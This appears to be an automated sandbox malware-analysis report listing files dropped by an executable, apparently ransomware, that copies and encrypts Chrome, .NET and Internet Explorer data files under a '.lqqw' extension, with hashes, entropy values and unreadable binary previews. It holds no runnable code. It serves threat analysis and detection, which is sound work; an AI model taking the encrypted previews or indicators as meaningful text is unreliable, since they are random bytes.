                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlSubresourceFilter.store.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):128855
                                                                                                                                                                                                    Entropy (8bit):7.9985250577206015
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:INd7zcg8W78ERhtT+CLhiWgJrBkiwDkGhIYfHJB:S7IPEvt6Ihh0SSPCJB
                                                                                                                                                                                                    MD5:C4A46349C705852DDBD619E658FC9907
                                                                                                                                                                                                    SHA1:0B2AD326B7F56F46664EC04DFD31693B21E164ED
                                                                                                                                                                                                    SHA-256:2EE4F2D78A601BE61C8A58849C8BE6306338920E5EFB134C64171FFB8F90E768
                                                                                                                                                                                                    SHA-512:C3FFDB6F01BAD70B6E075541747C2A190CE93AAC28DFFABFAB9DF7DECB9F2DA84A79EF17B03689D1A6B9DF009529A220C79348CF11398879992FC3CB9EF62D1F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: A..............:........~.^.#\..a.2kN....c......yV;.;.W.3a.w..J....v)..U.<..&.L.PV.EU[l..,...p.3....<.g.3.E.......pW..s.D.S.0..x....0.^|...:.,g8Qg..)\z.9*v...B......H..J.y.........'..u...W.9.e.Y.0.M..oS.....h..5...d.3.`.4..9..E...]o.M...f.S.U.T/..!^tS.7.Fm9.$(..C.@...8."...3a<q....{..6.YL&.(X......*.....b.2.;..t..v@.G..BO;.o...6%..=GD7.:.......q.&J..)..W.t....^....*.....L.)...dr<..z...;........|..!.. ........VKn.....=..C..T#...+.P#....b`&2.x<`.m2...86+c....(..s..`....}..D..@[!...g;..7...<TV....B..rE.=..T.;M...c..{..i.+..0|MZ....`....Y..R){....V":.^q.....B`...*.Zy..+.5b............!..eG.. ........H..R...!;...YpK~..k.Q..|`_...k..g.t...;a..~.....%...a...@A..Z O..X.S......Aw....fwn..E..K..W3|.....M`+.i.......A....xf..+..L.0G.:.u..D.}.)....*C..f/..WEm.".O5.4.\...9..r....J..~1...\=...R....=,..k..........c.T......k..,..o..F1D..W..j;[:.~.....y=.e...+u.}..X8..=.s...6...E2...a..9.....x.`.%=Z7.....!.....h..,1.6..........~=X*.z...>........I./oh..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlSuspiciousSite.store.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):13572
                                                                                                                                                                                                    Entropy (8bit):7.986755387082616
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:3R/9qPzg1lR381xDTdxngkR7nhHPKmKEeVIzx7:3RAbg1lR3+CkX0cl7
                                                                                                                                                                                                    MD5:431D37AB4C0B852ECE85C5B0483E0A43
                                                                                                                                                                                                    SHA1:728667AF3DD0AD3D7538093BA81440353C3ABE49
                                                                                                                                                                                                    SHA-256:49DE08E997033F15982EF60DB29CAF7DE46F3D0057EE77CF370852C7889D068A
                                                                                                                                                                                                    SHA-512:C36CA8214067A2B832B42F0DE29D22BEA12B39EAB8608E8A0B0E93792298AD4C346A9BEDCC2AB2BE4F406219270D0145311FAE1AAAE89551B4B7B874FB423A50
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: x....Dwk::].?.._e....n.<..<.'>D..).l.UR~D..5i*.[t.U.&...V...-...8......w...*bAL...Ga....n..X.w.[..M..,.n........:{P.s....d..ZBF.....F.08f%.Y|...`w.....~.i+..A;..0 .:".tz7...|.H`.TQ.....J!..;_...6.rpw.@.....hDo..n$.... ~v.....KU/Q}.....[.....=! ...,s...W.c..n...0<P[.[b.#.K.(va....k...&.)(A..g........>1W.l@..$.b.K..R..d.E.2..A..aLe....T;..X8.KN..[.8.LrL..L.V.3..o.....S.kU.Y.<".2..b........Q%.....0.tUC.R....:otv.,.6.:...8..7.jS...%..a.@9....v.}.u...~D.!_8,M...../.w...4k.7PF(..PUH.1..O7d.!$._......|m.p<x6..-.=.SQ.f..>$..ow..a.J.1..9*...3..FM|.. X$...<...L.g.,...t.c.s!..v-...C...I4j.R~.G;..... .....I.....m.f..e.@H.....V.@...j.%..`(S......i..&. .M....z..<.U.Ib".%..@..f[kC..V...Il#=......1G....V.F...B.K..viTi.l.;.+...p...!...t.a 0..h.>Hr.....bN....../..&.O..! .i.dp...k...x..XQ..\p...^.. p+x...-*...C.t.@.=.D.m...#eIV....{../..q[..r...?.l.w[O...{.i>0s. ...yq.=._..EWK..n...7"<..0.....|=[...(...!`<O..)K...^x~.#.yR.%D@_....|..^..6..}.....8..IHO....05y..X...8...
                                                                                                                                                                                                    C:\Users\user\Local Settings\IconCache.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):18194
                                                                                                                                                                                                    Entropy (8bit):7.98816061547235
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:JF+166d1D6rcc2Ni0ZA2a2bNOv41YBSGD8SlhcEVPpGXoDyC12pKdLTKZr:fF6d1D6rX0ZA2aCY2olWmPpGXoDT1vpO
                                                                                                                                                                                                    MD5:3C2270FEDAC009E6CA9E377FBF9928A8
                                                                                                                                                                                                    SHA1:3376A4DFB5B0218C65E467F662B2FCC40021F9B9
                                                                                                                                                                                                    SHA-256:D0CD189863ECF06C7D7211C665774013F71BA35A05EEE3B499697DF73E06A056
                                                                                                                                                                                                    SHA-512:B9BC7110CC1FDD74A335CE40CDFEECC3C19A87622E89C83010CA066B9527EF47E79D641CB8B95FB392F7AC3B56E221B2007F8FC35E042126E078C3B973507AB7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: w:....lB.....8....;.I....+@.&/^..........d.8....'Z.l..]Y......G.A...iZjT..k8.A....S..i/=%G.~>.C.j..q.xE&.a).....iVN..p...\.tG6...km^dA.^f.\...........;..3.P#........0.._.6../....&.v... .....k..:.......K.w.6.....5..8c`@....6...%Y...m`.M{.....G...@...Z....]>51...,$...a&...2Y........+.......^...D...g..._...fD.0.W..h...F../.....,..u\..K0z..w.-...t.x.....:..'...i."yt.....`..Zq.....H.....V....(,.M..J.......6.=^..RT..Q..t.........y..G.lUP .^..f.p...f.:P..^..c.r`.....c.8b....A...3...c.XsOA......c_......Qm...D8.R..{..F..W.....F..Q....#.%.;.C.$E.K.....j.....).|`@.1*S..I..!..xg.A4...u..4....:l...*-..{...B..f]..q..:......Y..2..m....}.4w.....v9o.J.).&f.J....m..0(=.&?Y.A..Fb.QV.{....2QN(..T..8....%.F....l%0...).B.3.M.M...R..J[.F$/;..o.jV/.....W|.t..........c*ku#8.46........fd..X'....h=.-r..OZp0...~....m.#r.)..#...FSm.....D~..Ybm....e.Z..h..._,1.?|.;..3.....g..|..6_.+...d......0m......hw?.u...[tc.1:S..5.z|.xe....A..E.G..M..h]..Q......pDz.."
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\CLR_v2.0\UsageLogs\addinutil.exe.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):532
                                                                                                                                                                                                    Entropy (8bit):7.539314432587971
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:8meb7F7L3G6QV55jV/1i6m2r3Ub4scii9a:8mevF7znQVPjhQ6FrEcsbD
                                                                                                                                                                                                    MD5:07B4A8F8204157F3B0DA7433F8A70D94
                                                                                                                                                                                                    SHA1:BC7E879DD5A025AF633502CBFC683D0D7868E733
                                                                                                                                                                                                    SHA-256:7CBA96DACE0C4DD90DA5D010CDE8BF345C0A52ECF07B0621AD37F9736E4B3169
                                                                                                                                                                                                    SHA-512:B80E947E1B62A4B28EF1E52B22A9057DD94D237C9DAE42D59614CF6136F7D47B2DB9DB1A931DBC0714B61C5C6044D30061F281DA19FB4FB48FB0E979A9F73C12
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...`.......c.hl...G..G.\.<.#.xJ*r....%.4>..4.y..e.......#..eI.I..:....A(...M..q.w.F4yS.p......+Z......]v.Y...~.........Yz...9(..(....r.r...v..N.=....c... .W.D.K...D2....^V.....Y..N....t...z.....O..2..8bQ...t.p..!.{.Q?G3..[O.~A(.....4..........x..t.{....<;<...sn..h.4..[*.~'....B.&I.2C...\.g.........7@.......G...DKc..5..0j.#.(#.u..s.".CX.!`B......p.Zd.`(Z.e.....\....V..^......)4....wq.Zz....W.Nld.$..J%....f$.^..........s...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):717
                                                                                                                                                                                                    Entropy (8bit):7.655625493894432
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:AwB0bq9PvlTeC7qaRgYMqSfGLLRY5Zplqq4x44LCgQ1KuClomllaGAcMxNMO5vR8:AwBM/C4bqSfWlY7q6gQUuCl7l7Ackxvi
                                                                                                                                                                                                    MD5:5CB074AA902E177EF342D220F4BE0401
                                                                                                                                                                                                    SHA1:417D0A06AA3E1AA0B9EFAC8423C8FE77CD2FD42F
                                                                                                                                                                                                    SHA-256:DCE689195BC789F41B9CE774DFFD2128E9B4396C85FDE004EF562453D755A979
                                                                                                                                                                                                    SHA-512:305B4ED4A491AC594C6C709FBC1EA61BA1D83A50905D260C329C65AACF2A9434EF4ACD39B71F27D67EACFB9011FC73A0134FCB7868A901E0C1392345747E06CA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ]-5:M........*.8...x.*!.....$.S.n.r...L.c`.t].-......zm..q-..15G."W.Whz.3,....y.....v.z.7N.o O..d...|.u...:.;@O..D(n/..M.c......'.......n..X3...<..7]..8..E.iTp...L....;o..A.dB.$.jH....d.|..8o.......F..[.GC>mi.20.sN3.u../y.c..)/Y.(E1<.7...A..r..J.W.w.|....H.C?........SJ4.$..Y1..Y.n.jv.1D....[.l....>.B"is.Y.3i...\hS.^6..I'...0..|.Z..]...H%:x....(..Ng........*..F..d'.(..I......z[..\-=U..}]F.E5.I....:!...R...........R..B.`..u....<...&J.-..]..&E.l#...#. VsPw.D...y..x=.&`.!..#....P..........{........V.%.],....>....."0.c{e.H...a..o..M+._34..<.7.j..V.....l!.W...M.7$....L.Y.)V.&...4=gO?....`Nc0.....O...v..'...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\CLR_v4.0\UsageLogs\NGenTask.exe.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):971
                                                                                                                                                                                                    Entropy (8bit):7.783322105746818
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:74RJJkHY8S1KY/HRsDbVGRjQRTG97HQbD:74qxS5HRsUJ2gHKD
                                                                                                                                                                                                    MD5:311E4E0C676A994D88EF074BDF367C0D
                                                                                                                                                                                                    SHA1:B93231A0F8BA43CA18D4DCA10D1F0EC31D6403F9
                                                                                                                                                                                                    SHA-256:753FED11E05CDF93D5F553726D6493D4DCA7717176B837838D6C8E8C2F332C50
                                                                                                                                                                                                    SHA-512:0C1CDDCEA1543B2AE54867AB844F2783F5F5F7059CAEAB8C3468A2ED4ADA95B09FC88E68EE7FA31C4FA2DE847EC255B9D670D7696EB94931E21A6AB91A0D61F6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..Q.z.....0....w.=.x....W.Vz.g...e...f..+.*nM.9.V8...h..6.RL.Mq...a...M.?..."..R..."......2....F.M.3L.e%#..h$=..h..L.i,..X....+..~.E.Y..3d...^MV.g...X.EZ..J...YG.....;Bp....#..V8.2...p.g>f...?g.]...UYb{.i6.....^.R..,.S../W.3......M]...T.u.94Y.JF...G.U.....Y.=...+.h"}E..W.....j...S....(}..i.....(.{I..T...M....w.+.5G.%.....q....,c`ww.?D.gr...0.$..I}..8R.:.[.;...k......*.....P}..<4WJ...].g.O..X.,*.....hB..k.*,...W..G.....b.....D.ry.......?....!.........A.T.Q..........p.$....,....Ph.....?w.K.J..o ...0.u.F....^..;d..M....1b.o...k..KH...fzX<.n...b......6F.qu..+..V........:.V.CV..zX.l.../Y'lQ{.G.qB...y@n....(/.-6:.....]X...k...x..t..:.....i.7...&9^n.vvZ...^#.1h.%..1.t...39...0UA6./.......L.Epr.n.b...HN..t.._..cB%.?..q7..@...v..-.,.._.q.@..0..{.....MeRs}..;.l.].-..^j.Wb&....S..t.~.y.1.&.HX......F2..lw....Q..[...Asm..{.....N.6....p,.....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6132
                                                                                                                                                                                                    Entropy (8bit):7.967075557384897
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:VUTn71jLu3hayzCP58BnxTZynHgY2+PIQRCGzMcwiEtulBUF7lXJ5bEC53x:VUr71vHuCP5O6AY2khccwidXUFJJdP7
                                                                                                                                                                                                    MD5:086C40FA4AA9AE1D0FBC156CB3F5961E
                                                                                                                                                                                                    SHA1:17C4C6AB8471E08DBDAED496373EAF98BD2A9D47
                                                                                                                                                                                                    SHA-256:0A017576F423A20E91B238AE50E422BE52C27F261CADD2212775B80A13646D0E
                                                                                                                                                                                                    SHA-512:A028F581716AE76A50FB1D81A314447F41550B621B6A1C204F51E888D1DD544963C1AA17ACB533695F97F2EADC634875BC14D375C01D2169336A8EFC6DA729F5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .l...Z............b.d.......3.R..(..t.'D.d..y...0^..JNi.M..a...E....W..*Z+trk.U<....<2...; .yp.-1...d7...p. h....s..:'DA. 5..7...4.......sKK...x.i$t_.?......KM.........D.$.....G..|..x..2.. .~`vNv|.an.]....g...G/eS..1....S...g.Cx........U..............N.He.r.v.H.K..>E...l(.....z{..........(P.....J...L.+...Gc......./.fw.o.=..|#..../}0.q..~2.......0.*..n.4P..~.............2,l..+$ .~..=j"..\.....V.!....+<G..xz.f.b1....%...6w..a.S...I..i.>..\.I..3-..]...KLh...4f...}N{.m!=.z..nN..9{.P.v..b)g.r.&...".|*:2.j..A.I.8k|.T<.0i.hN.\.vp..E.<...&.;...<..~..8x........p.(._:.....\U#..".....]......`...x...%3."..Q.`............2.....bE:7[..x.l.......N..qz..N.g`..rE...(..J..;...E8nK.-L/~..Q.a.;*....b.lz..../...n....`.s~.....?c_..}.1%...).[.|.....~7O.........E:}.`t.......v.*..t\.*.....U|z2...0O..A(H....E.JF.U.+e|L8<9:......r.>...g.G..T.46..6!q....>yz..y.../..X...{....^......Zx.q..k.7....t.v.Nr...|..uAX...b|8..{)..g..}d....}`>.u........$!X.....t.?......_..?P.a....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\CLR_v4.0\ngen.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):664
                                                                                                                                                                                                    Entropy (8bit):7.636822951070409
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:TTQWk0rbhGIYMO5KmcKPvDEnIkNByUvDfZQK7G1mbnw7LL2cii9a:oWk8bhfYV0dKzEnIkN55Pnw7ubD
                                                                                                                                                                                                    MD5:9A90C851502E2023608AAD00A8703F11
                                                                                                                                                                                                    SHA1:48199B7FA7E5FA3752D48F05D3CA3AE3720D9319
                                                                                                                                                                                                    SHA-256:366FF615F7EC57FF1850C21BABDD4F6D91E343B9EA4C62F380AABF4B5472BA57
                                                                                                                                                                                                    SHA-512:B191748BE889EEA1014A20C520F22975CCFE8813D801B3AC08BF8D5E8D7CD2B2EB4552E77C35ED26FAD78AE792E2DE9BA9C1F91257A1D66BA2E391C28BAD4474
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: G.........~D...R}.f.....3Pv..[.v..:...r...VZ.r....@R..MoT..a.c.....|......iQ.r.Q4.y....q.*...T...u.....E........Bh|.^V........=.6..}P.p=...N/...P.fG./..rVYg.53z......k....1..DR......&....R$s9..&."....8).m.*...r..:......[...f{...... .... W....j.....q..O.z..!BV.....&....K..AV.q.*.:X.;q...P.E=..\DG....vb.....]N...(`J.[.......A#..........5l.Xp.....ho9.\fSQ396mI ._.@..R>..o.f....Q. ...../E6w]...$..........#.\h.*....N..T~@/b....}..*.=.K.....(..f.0..v..N.}lez.9..)5...#;Z..t..bd.w2.%XF..:.....k.2..d..O,...^9"..H....L.[I.v...yR..v6.!X*...J..E).....3......K.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\CLR_v4.0_32\UsageLogs\NGenTask.exe.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):846
                                                                                                                                                                                                    Entropy (8bit):7.717525940106376
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:an9jBBoDlgXrvzVMdZhO0L80qOH5R63V7bD:aJoD6brmjhO0LbFe/D
                                                                                                                                                                                                    MD5:B983453D9B8D96CA7B8415FEABEC222A
                                                                                                                                                                                                    SHA1:11C0D626CA7A60ADEB7C143E41B0BACF709B47D1
                                                                                                                                                                                                    SHA-256:5E538A4955AFBA49746977744C0D24E75950416C7CD8A86CA800CDA78413AB11
                                                                                                                                                                                                    SHA-512:0285A97F18E154D44ADE5CBE54E3919B0BE772214083ED56111E2A59848F80F8051F9A5C642B8CE02C3F34D68BF56A4EB2DEFC23610D07C0CFF4937C381CE355
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .G1u~..p......w2...<....1..].]..A.S.Fx.E.R.`6j....$..F......z.]:...z4..~i.ON.G.....|......dcS...Q.Z@KB..+...!..F.c&.W....|o.Q...P.E....?3.'.v(.E......z4-.~_O).RS\.k..F.J.(N^..g$.%.g^....D"*....p......i...x.j..... ..LdmC6.........N\.....6.uw......yu....9.......Y.v.T....."Z"6&...Nf..#.o...........>}Y...4.y........HH....}w...x.g.Jh{e.p.....W......R.ED..N...=.P.Y.3l.U.....8.vz...r..n...........w.$x....g?g.....Q.(..?N..UJ2hh+.F..!..$...<H._.X76lB.).c..,f.f..V....1.{.<;Tg.a.d.;..{..a...zWB.Z.u.......n.....'...<..A>.o0>.\.........6...%3.2.p..6.$!..D<.-l..+..<...):..a.....4.H....a.....~_Su.Tn..v.&..o.jS..5.<.+F.|....V..L|BFq?.7S..#^3.X....t....`......K...\O.e.KWx....N..B......$...5..2.oh.L...8LitR.UA..q...e{......q..3.H..q...rF.55VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\CLR_v4.0_32\ngen.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):660
                                                                                                                                                                                                    Entropy (8bit):7.654325008863378
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:wChCnrNZgs2kM+kC2Ompw9r2WW/RAT4EaRNZVwrbaUp956OM0hJwcii9a:7qks9Hbmpw9r2WaWONo+U8oCbD
                                                                                                                                                                                                    MD5:6468D9D7B3CCAA3112BF64575E6CF5FE
                                                                                                                                                                                                    SHA1:AFC175C497B714667ECF4B7EDB2C698C39E2DA9F
                                                                                                                                                                                                    SHA-256:09A06D9CEA7557FED03AE74A70EB2665C70DB8FCEC0C89BE1E862E476390970D
                                                                                                                                                                                                    SHA-512:B06A8FD3415AEDD7C9896B96EC456E9888D4BB4EF4F04457742B34AC7A5A1677598AD3C43F565A0CB13A21CC4624F5219A93A779C07A193AEEC3CDD307A82FD7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .z.2..{..(.<D.}?..Z...O.'..T..[..0...W...a..8g..f<...=.G....6.s;E.7.......).*..+..\.q.Z_..S..AD.w.0...%......>oR.......G..]z...../El..5$.c..!.o1...y.`@.;G]....W.%..........@A...>o...\Q.;.......M._./.=...M....'.U.E.._...1......5....:}.|S..<.8P...a..8.AH.<gt.....M.m..!\3.6....J.,..C=.m.. .@.`.|..].......!>..n...c..n..jE.'.h.:"..q..I`.4z5..m.o^.. .x...'._....iq..S.W.9.....f..,x...x~...|....!..M..........[.4.Z.<.S..3.z..W..]....+...p....=DvQ.~.k...........i..HY.nk[6.RU(u.3....a.^.t.n..i.....x^.8h.a..f.k........4D5..x.._.^h.o1V...c...m....NP...$....._.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Internet Explorer\DomainSuggestions\en-US.1.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):18505
                                                                                                                                                                                                    Entropy (8bit):7.991108560575374
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:+B6+ccQzSHBxIM4ZCLillBR0MLE43osRttOQ1g6J7:N+cyHn8loM13pftO8gS
                                                                                                                                                                                                    MD5:E25FC973AF42C1A5DD655EC9022D07C6
                                                                                                                                                                                                    SHA1:7F61B8B9EE2F6A9989D01C646C3C7EDBDCB7679D
                                                                                                                                                                                                    SHA-256:8EFBAE251166714A12FB3BF0E193894A965382FEEF46700611C8F92CCE6073C1
                                                                                                                                                                                                    SHA-512:D5A25DFDE5543F75A76CB6244E9D19C4910C78311C2A186164E0605BC714AB27A60319110186E1DD540590F755BD5AB44610A394A6D8144E685F2D7095A355FA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: TX.^....z.W.....r...`^....v.Y..Z..............g...n:Eu..[Z.cT.....<....b.N|:.....NH..+...l3o.../v....E......._...3.9g.;b......^.E.....D...o.0t.n.....g]>..>.....8..^r..,.r...;._.S.1....T.......R..~....L,i..HT...z.....s.Em..Q.^?..+.%v.......,.e.=..#N^.7..Q..|L.#.E...k._..H.<....0;.H<.u8.s......;..Bm....s.T.j.8..:?.........|..|..^#E.n.|.l*x.eE.....\Z.bP...'1.VD?1D[*....a....,Y.......].*i..".(akc..#.n..J......5o.o;..?.*4}.2.b&..1.,.....M..Z.W!+C.......5Lh...G).zZ.#.!.'[$r.cl...0......:.~.!.~.....:5..|.q..B..*6...#6.....$....U."....g.. .'...k..q..d.2...m...VNxU q..a.[.B...EIY?[.....*W..Y0....O..L...F.'..h@1.....o/q.w.|.UO.E....a. ......g......+|.#..-^p}u./..8pR[,.|..9.QGJZ..[.^].....J..>..s..NZG...h..V....zuE...gD..A-.F.../.V....2t^.H.....U.9v!).....O<.. ....R.2.6.=R.GH>.]H..g O..+..[.p.1....k..X..i...eD.d..J.;-).(.<|A.......OJ.Jq:....-..).ug..e~$rf.)b6.mE..>.T.........k.n.A.$E..X..!..Oa..V..-......)<.......&M#. :].($.X.K.......d..Z.FrZ.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998707045917503
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:dYKGUYChiZoCcx2qWJWRbE5zKbodoSW7Z0Dnn+MrvcNh:pGUYChieCcx2fI9E5zKbQlU0DnnR2h
                                                                                                                                                                                                    MD5:3DC4EFFDD6C7FC33D9A4C8CF22668072
                                                                                                                                                                                                    SHA1:9F6297A8B7EABA0004101B9E879233B3B24EC919
                                                                                                                                                                                                    SHA-256:E2D8A5F2A4169BE1BCB7DFB05192AFF8EEE77E2834BE5BEE355E3BDB8C40708F
                                                                                                                                                                                                    SHA-512:54C8AFBF1EE922D00391B94785950FE85019377E20B97A25A3F442346CEFA0B3B07BF7F63ADB44B8E69B5C732BB952FC74D00991F424303BC9569E049ACAD5D2
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .c..AQ...2]...k.m.%..5...o.p../L..qX..b.....ek..."F.6..q.....y3.OIhd.V.......m.@..rN..K..-.}8.y.,.-........f.\%..(..d..y.#.B,...f..L.N.....h.....:./.|`..e..Pw.m.X&?+.6.c7A.]..q#....Ec)...>K`..O.......4y..vF3..i.=....yz.=._Vl.f.#..T.=7....m..... -.....r....n<V..*.+.._..}.#.T.N|..;...@......e....!..(RF...k.......iN.HX/.1.BT.1K...[h.!o..!.v.h.Qw,......R......e.".N........k.)L....+0.#h;.lI...B.......ZZ.....nf..d'u..`.Y..p.{........8...~...f..EG......p4.DM_.em BGM.7t.B.M.....e....#.J.cX;WE..[Ry.!.9;JR$.k..)j..j9ox....F..%z...J...FeG.qz..<.....r#9r9.Ud......}.![.E....y.I....W.Q.z#.{...R.....!w*.=z......j....G..i.M....L.^.MH....!.@..`.....1.6(.........C,.`7....6A..:G.,..t.4f.~...L..A.V..H..|.p ..0.8..M.g.!.:..>16.E;...{g.?......Tx...8..B..y..g.C..E.{X2"2...E@......H..iCy...O.;D...z.&...gH..?.i"~.iu..}..E..C..s.|..)...{W.d.K..WmW...j..q...Cp...J...@.`.61....i.h....R.....d.....=.......]../...x..M....S....<LL_....^.@f.)f.....v..gy.j...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Internet Explorer\MSIMGSIZ.DAT.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):49449
                                                                                                                                                                                                    Entropy (8bit):7.995950183247359
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:FvAIGcRTjqh6Rf/sP4aq0RrjVSZNUAxs0XG+UIp/AR:FvAqFjhfO4aq0Rr5SZBxs0XGqW
                                                                                                                                                                                                    MD5:EF1331EA3CC212B76A2600EDA70EA2DD
                                                                                                                                                                                                    SHA1:792FD7BE9238E669B69616823822C54FC9728E7C
                                                                                                                                                                                                    SHA-256:368B524FA48D3B1C73DB0673A51799C252330377A4DF784F5553F2FA01B36965
                                                                                                                                                                                                    SHA-512:E02AF4F03053D90B12623669D20F6AECF1DF11445107576D90D1BC2B0E19E7F0522888316D196D1FB737A49FEDEDE3980183FDBD2717CC4D2E800E79934C8A76
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
